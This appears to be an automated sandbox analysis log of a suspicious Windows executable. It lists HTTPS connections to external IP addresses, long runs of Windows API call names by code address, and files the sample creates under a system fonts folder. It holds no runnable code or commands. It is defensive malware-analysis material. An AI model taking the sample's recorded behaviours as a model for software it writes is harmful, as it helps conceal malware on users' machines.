            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
            Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
            Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
            Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
            Source: unknownHTTPS traffic detected: 142.251.46.174:443 -> 192.168.11.20:49721 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.191.33:443 -> 192.168.11.20:49722 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49733 version: TLS 1.2
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 0_2_00404FE3 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404FE3
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 0_2_0040310B EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,LdrInitializeThunk,GetCurrentProcess,ExitWindowsEx,ExitProcess,0_2_0040310B
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_0040310B EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess,12_2_0040310B
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile created: C:\Windows\Fonts\Klud229Jump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeFile created: C:\Windows\Fonts\Klud229\activismJump to behavior
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 0_2_004048220_2_00404822
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 0_2_004062C30_2_004062C3
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 0_2_00406A9A0_2_00406A9A
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_0040482212_2_00404822
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_004062C312_2_004062C3
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_00406A9A12_2_00406A9A
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_076AE79012_2_076AE790
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_076AC58212_2_076AC582
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_076A641812_2_076A6418
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_076A52FB12_2_076A52FB
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_076AC2B012_2_076AC2B0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_076AD0C112_2_076AD0C1
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_076A709812_2_076A7098
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_076ABFE012_2_076ABFE0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_076ACDF212_2_076ACDF2
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_076ABB4812_2_076ABB48
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_076ACB2112_2_076ACB21
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_076A692012_2_076A6920
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_076AC85112_2_076AC851
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_076A37E512_2_076A37E5
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_076AE78112_2_076AE781
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_076ABD1012_2_076ABD10
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_076A3D8812_2_076A3D88
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_076A297412_2_076A2974
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_076A39B112_2_076A39B1
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_076AF8C812_2_076AF8C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D71FA812_2_37D71FA8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7CB7012_2_37D7CB70
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D70B3012_2_37D70B30
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D74EC812_2_37D74EC8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7269012_2_37D72690
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D791C812_2_37D791C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7185012_2_37D71850
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7FBD012_2_37D7FBD0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7FBC012_2_37D7FBC0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D793E812_2_37D793E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D71F9812_2_37D71F98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7F77812_2_37D7F778
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7F76812_2_37D7F768
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D70B2012_2_37D70B20
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7268112_2_37D72681
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D79AB812_2_37D79AB8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D74EB812_2_37D74EB8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D78A4012_2_37D78A40
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7ED9812_2_37D7ED98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7ED8712_2_37D7ED87
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7004012_2_37D70040
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7184D12_2_37D7184D
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D7001E12_2_37D7001E
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8719012_2_37D87190
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8AD4012_2_37D8AD40
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8A6E812_2_37D8A6E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D875D812_2_37D875D8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8DFD812_2_37D8DFD8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D85FD012_2_37D85FD0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D899D012_2_37D899D0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D845C012_2_37D845C0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D85FC112_2_37D85FC1
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D815F812_2_37D815F8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D88FF812_2_37D88FF8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8BFF812_2_37D8BFF8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D82FF812_2_37D82FF8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D875E812_2_37D875E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8DFE812_2_37D8DFE8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D815E812_2_37D815E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D88FE812_2_37D88FE8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D899E012_2_37D899E0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8BFE712_2_37D8BFE7
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8ED9812_2_37D8ED98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8CD9A12_2_37D8CD9A
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8119112_2_37D81191
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D88B9112_2_37D88B91
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8958812_2_37D89588
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8ED8A12_2_37D8ED8A
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8718012_2_37D87180
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D82BB012_2_37D82BB0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D845B012_2_37D845B0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8CDA812_2_37D8CDA8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D811A012_2_37D811A0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D88BA012_2_37D88BA0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D82BA012_2_37D82BA0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8275812_2_37D82758
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8DB5812_2_37D8DB58
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8415812_2_37D84158
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8BB5912_2_37D8BB59
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D80D4812_2_37D80D48
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8874812_2_37D88748
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8FB4812_2_37D8FB48
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8274912_2_37D82749
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8DB4912_2_37D8DB49
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D85B7812_2_37D85B78
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8957812_2_37D89578
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8416812_2_37D84168
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8BB6812_2_37D8BB68
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D85B6812_2_37D85B68
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8C91812_2_37D8C918
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D83D1012_2_37D83D10
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8571012_2_37D85710
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8E90812_2_37D8E908
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8C90812_2_37D8C908
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8230012_2_37D82300
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D83D0112_2_37D83D01
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D80D3812_2_37D80D38
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8873812_2_37D88738
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8FB3812_2_37D8FB38
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8AD3612_2_37D8AD36
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8572012_2_37D85720
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8B6D812_2_37D8B6D8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8A6D812_2_37D8A6D8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D852C812_2_37D852C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8D6C812_2_37D8D6C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8B6CA12_2_37D8B6CA
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8E8F812_2_37D8E8F8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D808F012_2_37D808F0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D882F012_2_37D882F0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D822F012_2_37D822F0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D882E012_2_37D882E0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D808E112_2_37D808E1
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8049812_2_37D80498
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D87E9812_2_37D87E98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D81E9812_2_37D81E98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8A29012_2_37D8A290
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8C48812_2_37D8C488
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8048812_2_37D80488
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D87E8912_2_37D87E89
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8A28012_2_37D8A280
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D838B812_2_37D838B8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8F6B812_2_37D8F6B8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D852B912_2_37D852B9
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8D6B912_2_37D8D6B9
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D81EA812_2_37D81EA8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D838A812_2_37D838A8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8F6A812_2_37D8F6A8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D81A5012_2_37D81A50
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8345112_2_37D83451
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8B24812_2_37D8B248
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8004012_2_37D80040
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D87A4012_2_37D87A40
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D81A4112_2_37D81A41
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8E47812_2_37D8E478
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8C47912_2_37D8C479
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D84E7012_2_37D84E70
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8E46912_2_37D8E469
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8346012_2_37D83460
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D84E6012_2_37D84E60
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D84A1812_2_37D84A18
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8641912_2_37D86419
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8001D12_2_37D8001D
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8F21712_2_37D8F217
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8300812_2_37D83008
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D84A0812_2_37D84A08
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D89E3812_2_37D89E38
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8D23812_2_37D8D238
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D87A3012_2_37D87A30
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8B23712_2_37D8B237
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8642812_2_37D86428
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8F22812_2_37D8F228
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D89E2A12_2_37D89E2A
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37D8D22712_2_37D8D227
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F661E812_2_37F661E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6750812_2_37F67508
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F60DF012_2_37F60DF0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F68CF012_2_37F68CF0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6E2F112_2_37F6E2F1
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F61FF812_2_37F61FF8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6B7F812_2_37F6B7F8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F648F812_2_37F648F8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F674F812_2_37F674F8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6CFE012_2_37F6CFE0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F60DE012_2_37F60DE0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F68CE112_2_37F68CE1
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F61FEA12_2_37F61FEA
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F63FE812_2_37F63FE8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6FAE812_2_37F6FAE8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6B7E812_2_37F6B7E8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F604D012_2_37F604D0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F679D012_2_37F679D0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6CFD012_2_37F6CFD0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6A4D812_2_37F6A4D8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F63FD812_2_37F63FD8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F661D812_2_37F661D8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6FAD812_2_37F6FAD8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F636C212_2_37F636C2
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6BCC012_2_37F6BCC0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F636C812_2_37F636C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6E7C812_2_37F6E7C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6A4C812_2_37F6A4C8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F666B012_2_37F666B0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6BCB012_2_37F6BCB0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F604BF12_2_37F604BF
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F679BF12_2_37F679BF
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F656B812_2_37F656B8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F691B812_2_37F691B8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6E7B912_2_37F6E7B9
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F656A712_2_37F656A7
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F691A712_2_37F691A7
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6A9A012_2_37F6A9A0
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F666A112_2_37F666A1
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F62DA812_2_37F62DA8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6D4A812_2_37F6D4A8
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F62D9712_2_37F62D97
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F64D9712_2_37F64D97
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6D49712_2_37F6D497
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6EC9012_2_37F6EC90
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6A99112_2_37F6A991
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F64D9812_2_37F64D98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F67E9812_2_37F67E98
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6128012_2_37F61280
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6968012_2_37F69680
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6248812_2_37F62488
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6C18812_2_37F6C188
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F67E8812_2_37F67E88
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6247712_2_37F62477
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6D97012_2_37F6D970
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6967012_2_37F69670
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6EC7F12_2_37F6EC7F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6447812_2_37F64478
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F66B7812_2_37F66B78
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6C17812_2_37F6C178
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6446712_2_37F64467
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6096012_2_37F60960
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6836012_2_37F68360
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F61B6112_2_37F61B61
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6D96112_2_37F6D961
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6126F12_2_37F6126F
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F61B6812_2_37F61B68
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6AE6812_2_37F6AE68
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F66B6912_2_37F66B69
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6C65012_2_37F6C650
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6095012_2_37F60950
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6835012_2_37F68350
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F63B5812_2_37F63B58
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6F15812_2_37F6F158
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6AE5912_2_37F6AE59
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6004012_2_37F60040
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6704012_2_37F67040
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6C64112_2_37F6C641
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F65B4812_2_37F65B48
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F69B4812_2_37F69B48
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F63B4812_2_37F63B48
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F6F14812_2_37F6F148
            Source: C:\Users\user\Desktop\axN56TZ3PI.exeCode function: 12_2_37F65B3712_2_37F65B37
